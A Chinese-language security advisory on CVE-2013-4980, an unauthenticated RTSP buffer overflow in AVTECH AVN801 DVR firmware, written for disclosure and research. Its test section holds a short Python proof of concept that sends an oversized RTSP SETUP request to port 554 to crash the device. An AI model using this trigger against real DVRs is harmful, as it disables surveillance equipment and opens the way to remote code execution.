发布日期：2013-08-28
更新日期：2013-08-29

受影响系统：

AVTECH AVN801 DVR 4CH H.264 (AVTECH AVN801)

描述：

---

BUGTRAQ  ID: 62033
CVE(CAN) ID: CVE-2013-4980

AVTECH AVN801是数字视频录像机产品。

AVTECH AVN801运行固件版本1017-1003-1009-1003时，RTSP报文处理程序处理RTSP事务存在缓冲区溢出漏洞，无需身份验证，远程攻击者可导致设备崩溃及远程代码执行。

<*来源：Anibal Sacco
  
  链接：http://seclists.org/fulldisclosure/2013/Aug/284
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

import socket

HOST = '192.168.1.1'
PORT = 554            
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"
print "[*] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[*] Response:', repr(data), "\r\n"
s.close()

建议：

---

厂商补丁：

AVTECH
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.avtech.com.tw/

浏览次数：2912
严重程度：0（网友投票）